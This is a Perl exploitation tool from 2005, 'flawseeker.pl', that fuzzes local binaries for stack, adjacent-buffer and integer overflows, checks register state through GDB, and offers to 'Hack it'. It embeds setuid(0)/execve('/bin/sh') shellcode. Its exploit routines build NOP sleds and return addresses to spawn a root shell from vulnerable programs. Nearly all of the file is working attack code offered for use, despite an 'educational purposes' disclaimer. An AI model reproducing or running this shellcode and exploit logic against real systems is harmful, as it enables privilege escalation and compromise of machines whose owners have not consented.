#!/usr/bin/perl
#
# flawseeker.pl v3.0 (c) 2005 written by Carlos Carvalho <nuTshell>
# (renamed from old fl0w-s33ker.pl)
#
# Description: .Binary debugger
# .Overflow tracker
# .Exploitation tool
#
#
# flawseeker use GDB interaction to get
# register addresses at overflow time.
#
# Exploit function available for
# type 1 (stack overflow) ,
# type 2 (adjacent memory overflow) and
# type 4 (integer overflow) only.
#
# Perl modules Devel::GDB and Switch
# are required. Install them from cpan.
#
# "This tool has been written for
# educational purposes and it is not
# possible (at least for me) to code
# similar tool that can serve for *ANY*
# kind of vulnerability and the reason is that
# there are *MANY* exploitation methods
# out there buddy."
#
# In doubt make questions
# mailing me becouse i wrote no README.
#
# Try: ./flawseeker.pl -h
#
# Contact: -=carloslack at gmail dot com=-
# irc.hacker.com.br 994 SSL #hacker
#
# Love goes to: my girl Karina Gonzalez. Really love you baby!
#
# Greetz goes to: eniac, hexdump, Shorgen, kid gonzalez, codak, drk, ttaranto, setnf,
# estevao, F-117, lewney
#
# DON`T CHANGE ANYTHING BELOW HERE IF YOU DON`T KNOW
# WHAT YOU ARE DOING!
#
use strict;
use Switch;
use Devel::GDB;
use Term::ANSIColor;
my $version = "flawseeker.pl v3.0 by nutshell:\nBinary debugger\nOverflow tracker\nExploitation tool";
my $shellcode_01 = #setuid0 by nuTshell
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80".
#execve /bin/sh 45 bytes
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88".
"\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3".
"\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31".
"\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
"\xff\xff/bin/sh";
my $string = "\x41";
my $buff = "$string";
my $space = "\x20";
my $sigsegv = 35584;
my $barloop =0;
my $bar = 0;
my $i = 0;
my $x = 0;
my $simple = 0;
my $counter = 1;
my $debugeipcounter = 0;
my $intcounter = -1073746000;
my $intcounterend = 1073746000;
my $inteip = "0xbfffff*";
my $logfile01 = "flaw_logW.log";
my $logfile02 = "flaw_log.log";
my $logging = "Off";
my $clear = `/usr/bin/clear`;
my $ret = "";
my $firstsigsegv = "";
my $gdb = "";
my $blimit= "";
my $bugfile = "";
my $logfile = "";
my $logname = "";
my $adjstring = "";
my $adjlength = "";
my $output = "";
my $option = "";
my $option = "";
my $HACK = "";
my $envHACK = "";
my $execargs = "";
my $debug = "";
my $debugeip = "";
my $debugeipcounterlmt = "";
my $debugeipinput = "";
my $enter = "";
my $counterlmt = "";
my $date = "";
my $filename = "";
my $cmdargs = "";
my $bufferlimit = "";
my $ownopt = "";
my $intergerjoin = "";
my $adjacentbuff = "";
my $errlog = "";
my $status = "";
my $type = "";
my $CMD = "";
my $buffer = "";
my $return_addr = "";
my $nret = "";
sub exploit_stack() {
$return_addr = 0xbffffffa - length($shellcode_01) - length($filename);
$nret = pack('l', ($return_addr));
$x = $ret - 4;
for ($i = 0 ; $i < $x ; $i++) { $buffer .= "\x90" };
$buffer .= "$nret"x6;
local($ENV{'ENTER_SANDMAN'}) = $shellcode_01;
system("$filename $buffer");
}
sub exploit_adjacent () {
$return_addr = 0xbffffffa - length($shellcode_01) - length($filename);
$nret = pack('l', ($return_addr));
$x = $ret - 4;
for ($i = 0 ; $i < $x ; $i++) { $buffer .= "\x90" };
$buffer .= "$nret"x6;
local($ENV{'ENTER_SANDMAN'}) = $shellcode_01;
system("$bugfile $CMD $adjstring $buffer");
}
sub exploit_integer() {
$buffer = "\x90"x5000;
$buffer .= $shellcode_01;
local($ENV{"HACK"}) = $buffer;
system("$filename $CMD $intcounter");
}
sub info1() {
printf <<EOF
Filling up $bugfile`s buffer with 0x41 (A`s)
until we get SIGSEGV, if progress bar stop try ctrl+c.
Wait...
EOF
}
sub info2() {
printf <<EOF
L4m0 integer overflow test.
Starting from $intcounter to $intcounterend.
We must have $inteip as \$eip address.
Wait...Go get a coffee :]
EOF
}
sub log1 () {
open(LOGCOMOM, ">>$logfile02") or die "$!\n";
printf(LOGCOMOM "\n -= $date =- \n");
printf(LOGCOMOM " Tested file: $bugfile\n");
printf(LOGCOMOM " Vulnerable type: $type\n");
printf(LOGCOMOM "First SIGSEGV occurs at $firstsigsegv bytes.\n");
printf(LOGCOMOM "At $ret bytes:\n");
printf(LOGCOMOM "$output\n");
close(LOGCOMOM);
printf("Log saved!\n");
exit(0);
}
sub log2() {
open(LOGCOMOM, ">>$logfile02") or die "$!\n";
printf(LOGCOMOM "\n -= $date =- \n");
printf(LOGCOMOM " Tested file: $bugfile\n");
printf(LOGCOMOM " Vulnerable type: $type\n");
printf(LOGCOMOM "$debugeip");
printf(LOGCOMOM "Got \$esp address at value $intcounter\n");
close(LOGCOMOM);
printf("Log saved!\n");
exit(0);
}
sub log3() {
open(LOGCOMOM, ">>$logfile02") or die "$!\n";
printf(LOGCOMOM "\n -= $date =-\n");
printf(LOGCOMOM " Tested file: $bugfile\n");
printf(LOGCOMOM " Vulnerable type: $type\n");
printf(LOGCOMOM "SIGSEGV occurs at $ret bytes.\n");
close(LOGCOMOM);
printf("Log saved!\n");
}
sub execmenu() {
printf <<EOF
-= flawseeker.pl v3.0 =-
-= Coded by nuTshell =-
Logging turned $logging
[1] Filename [ $filename ]
[2] Type [ $type ]
[3] Command line arguments [ $cmdargs ]
[4] Buffer Limit, default 1500 [ $bufferlimit ]
[5] Adjacent buffer [ $adjacentbuff ]
[6] Environment variable name [ $envHACK ]
[7] Start:End integer value [ $intergerjoin ]
EOF
}
sub typemenu() {
printf <<EOF
Options:
1-> simple test *exploitation available*
2-> adjacent test *exploitation available*
3-> environment test (no dubugging)
4-> integer overflow test *exploitation available*
EOF
}
sub menu () {
printf <<EOF
+-+-+-+-+-+-+-+-+-+-+-+-+-+- flawseeker.pl +-+-+-+-+-+-+-+-+-+-+-+-+-+
Coded by nuTshell -= carloslack\@gmail.com =-
Usage: $0 <ENTER> | [-h|-v|-lwo|-lo|-lall]
<ENTER> [run program with no args]
-h [this menu]
-v [version]
-lw [log WeIrD output]
-lo [log results output]
-lall [log WeIrD & results output]
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
EOF
}
sub printbar() {
$bar = $barloop + 1;
$barloop++;
if ($bar == 20) {printf("-") ; $bar = 0 ; $barloop = 0};
}
sub cmdarg () {
printf("Enter as many arguments as needed.\n");
printf("Each arg must be followed by <ENTER>\n");
printf("To finish just type \"exit\":\n");
chomp($CMD = <STDIN>) ;
$CMD .= $space;
while ($CMD !~ /exit/) {
chomp($CMD .= <STDIN>) ;
$CMD .= $space;
}
$CMD =~ s/exit//g;
$cmdargs = $CMD;
printf("$clear\n");
&execmenu;
}
if ("$ARGV[0]" eq "-h") {&menu and exit(0)}
if ("$ARGV[0]" eq "-v") {
printf color("bold");
printf "$version\n";
printf color("reset");
exit(0);
}
if ("$ARGV[0]" eq "-lo") {
$logging = "On"
}
if ("$ARGV[0]" eq "-lw" || "$ARGV[0]" eq "-lall") {
$logfile = ">> $logfile01 2>&1";
$logname = $logfile;
$logname =~ s/2>&1//g;
printf color("bold");
printf("\nWARNING:$space");
printf color("reset");
printf("Logging STDERR can generate\n");
printf("big logfile depending on your test!\n");
printf("Press any key\n\n");
$logging = "On";
$enter = <STDIN>;
printf("$clear\n");
} else {$logfile = ">/dev/null 2>&1"}
&execmenu;
printf("Filename> ");
chomp($bugfile = <STDIN>) ;
if (! -f $bugfile) {die "$bugfile $!\n"}
$filename = $bugfile;
printf("$clear\n");
&execmenu;
&typemenu;
printf("Type [1|2|3|4]> ");
chomp($option = <STDIN>) ;
if ($option <= 0 || $option >= 5) { die "Invalid option\n" }
$type = $option;
printf("$clear\n");
&execmenu;
switch($option) {
case "1" { printf("Command line arguments y/N> ");
chomp($execargs = <STDIN>) ;
if ("$execargs" eq "y") {&cmdarg}
}
case "2" { printf("Command line arguments y/N> ");
chomp($execargs = <STDIN>) ;
if ("$execargs" eq "y") {&cmdarg}
printf("Adjacent buffer> ");
chomp($adjlength = <STDIN>) ;
$adjacentbuff = $adjlength;
printf("$clear\n");
&execmenu;
if(!$adjlength) {printf("Adjacent fixed buffer length REQUIRED! Try again.\n") ; exit(1)}
$adjstring = "$string"x$adjlength;
}
case "3" { printf("Command line arguments y/N> ");
chomp($execargs = <STDIN>) ;
if ("$execargs" eq "y") {&cmdarg}
printf("Environment variable name> ");
chomp($HACK = <STDIN>) ;
if(!$HACK) { die "Environment name required!\n" }
$envHACK = $HACK;
printf("$clear\n");
&execmenu;
}
case "4" { printf("Command line arguments y/N> ");
chomp($execargs = <STDIN>);
if ("$execargs" eq "y") {&cmdarg}
}
}
if ("$option" ne "4") {
printf("Buffer Limit [1500]> ");
chomp($blimit = <STDIN>) ;
$bufferlimit = $blimit;
printf("$clear\n");
&execmenu;
if (!$blimit) {$blimit = 1500 ;
$bufferlimit = $blimit;
printf("$clear\n");
&execmenu;
}
} else {
$intergerjoin = join(":",$intcounter,$intcounterend);
printf("$clear\n");
&execmenu;
}
if (!$bugfile || !$option) {&menu and exit(1)}
if ("$option" eq "3") {if (!$HACK) {&menu and exit(0)}}
sub exec() {
if ("$option" eq "1") {$status = system("$bugfile $CMD $buff $logfile")}
if ("$option" eq "2") {$status = system("$bugfile $CMD $adjstring $buff $logfile")}
if ("$option" eq "3") {local($ENV{"$HACK"}) = $buff ;
$status = system("$bugfile $CMD $logfile")}
}
sub run1 () {
&info1 ;
printf("[");
while ($counter <= $blimit) {
&exec;
&printbar;
$status != $sigsegv or $ret = $counter + 4 and printf("> Done!\n$bugfile is vulnerable at $counter bytes!\n") and last;
$buff .= "$string";
$counter++;
}
if ($counter > $blimit) {
printf("> Done!\n$bugfile is not vulnerable at least until $blimit bytes\n");
}
}
if ("$option" eq "1" || "$option" eq "2" || "$option" eq "3" ) { &run1 }
sub run2 () {
&info2;
$gdb = new Devel::GDB (-file => $bugfile ) ;
for ($intcounter=$intcounter;$intcounter<=$intcounterend;$intcounter+=20) {
$gdb -> get ( "r $CMD $intcounter" );
$debugeip = $gdb -> get ( "i r eip" );
if($debugeip =~ /$inteip/) {
printf("[--->Done!\n");
$debugeip = $gdb -> get ( "i r esp ebp esi edi eip");
printf("$debugeip");
printf("Got return address at value: $intcounter\n");
last;
}
if($intcounter == $intcounterend) {printf("Sorry, no results.\n") ; exit(0)}
}
}
switch($option) {
case "1" {
if($status == $sigsegv) {printf("Debug n/Y> ");
chomp($debug = <STDIN>) ;
if("$debug" eq "n") {exit(0)}}
$gdb = new Devel::GDB (-file => $bugfile ) ;
$debugeip = $gdb -> get ( "i r eip" );
if($status != $sigsegv) {exit(1)}
if($debugeip =~ /0x42424242/) {
printf("\n[!] Status at $ret bytes:\n\n");
}
$buff .= "\x42\x42\x42\x42";
$firstsigsegv = (length($buff) - 4);
$gdb -> get ( "r $CMD $buff" );
$debugeip = $gdb -> get ( "i r eip" );
if($debugeip !~ /0x42424242/) {
printf("\$eip wasn`t overwritten.");
printf("\n[!] Status at $ret bytes:\n\n");
printf("$debugeip\n");
printf("Brute force to guess correct adresses n/Y> ");
chomp($debugeipinput = <STDIN>) ;
if("$debugeipinput" ne "n") {
printf("Max bytes size to increase buffer [20]> ");
chomp($debugeipcounterlmt = <STDIN>) ;
if(!$debugeipcounterlmt) {$counterlmt = 20} else {$counterlmt = $debugeipcounterlmt}
while($debugeipcounter <= $counterlmt) {
$buff .= "\x42";
$gdb -> get ( "r $CMD $buff" );
$debugeip = $gdb -> get ( "i r eip" );
$ret++;
$debugeipcounter++;
$debugeip !~ /0x42424242/ or last ;
}
}
}
$output = $gdb -> get ( "i r esp ebp esi edi eip" );
printf("\n[!] Status at $ret bytes:\n\n");
printf("$output\n");
if ($debugeip =~ /0x42424242/) {
printf("Hmmm 0x42424242! Hack it y/N>");
chomp($ownopt = <STDIN>) ;
&exploit_stack if ($ownopt eq "y");
}
}
case "2" {
if($status == $sigsegv) {printf("Debug? [n/Y]:\n"); printf("> ");
chomp($debug = <STDIN>) ;
if("$debug" eq "n") {exit(0)}}
$gdb = new Devel::GDB (-file => $bugfile ) ;
$debugeip = $gdb -> get ( "i r eip" );
if($status != $sigsegv) {exit(1)}
if($debugeip =~ /0x42424242/) {
printf("\n[!] Status at $ret bytes:\n\n");
}
$buff .= "\x42\x42\x42\x42";
$firstsigsegv = (length($buff) - 4);
$gdb -> get ( "r $CMD $adjstring $buff" );
$debugeip = $gdb -> get ( "i r eip" );
if($debugeip !~ /0x42424242/) {
printf("\$eip wasn`t overwritten.");
printf("\n[!] Status at $ret bytes:\n\n");
printf("$debugeip\n");
printf("Brute force to guess correct adresses n/Y> ");
chomp($debugeipinput = <STDIN>) ;
if("$debugeipinput" ne "n") {
printf("Max bytes size to increase buffer [20]> ");
chomp($debugeipcounterlmt = <STDIN>);
if(!$debugeipcounterlmt) {$counterlmt = 19} else {$counterlmt = $debugeipcounterlmt}
while($debugeipcounter <= $counterlmt) {
$buff .= "\x42";
$gdb -> get ( "r $CMD $adjstring $buff" );
$debugeip = $gdb -> get ( "i r eip" );
$ret++;
$debugeipcounter++;
$debugeip !~ /0x42424242/ or last ;
}
}
}
$output = $gdb -> get ( "i r esp ebp esi edi eip" );
printf("\n[!] Status at $ret bytes:\n\n");
printf("$output\n");
if ($debugeip =~ /0x42424242/) {
printf("Hmmm 0x42424242! Hack it y/N>");
chomp($ownopt = <STDIN>) ;
&exploit_adjacent if ($ownopt eq "y");
}
}
case "3" {
printf("Warning: Gdb calling does not support env-method untill now.\n");
if ($status == $sigsegv) {
printf("With $ret bytes maybe is possible to control \$eip register.\n")
}
}
case "4" {
&run2;
if($debugeip =~ /$inteip/) {
printf("Hmmm 0xbfffff*! Hack it y/N>");
chomp($ownopt = <STDIN>) ;
&exploit_integer if ($ownopt eq "y");
}
}
}
if("$ARGV[0]" eq "-lo" || "$ARGV[0]" eq "-lall") {
$date = localtime();
switch($option) {
case "1" {&log1}
case "2" {&log1}
case "3" {&log3}
case "4" {&log2}
}
}
#eof (end of FUCK)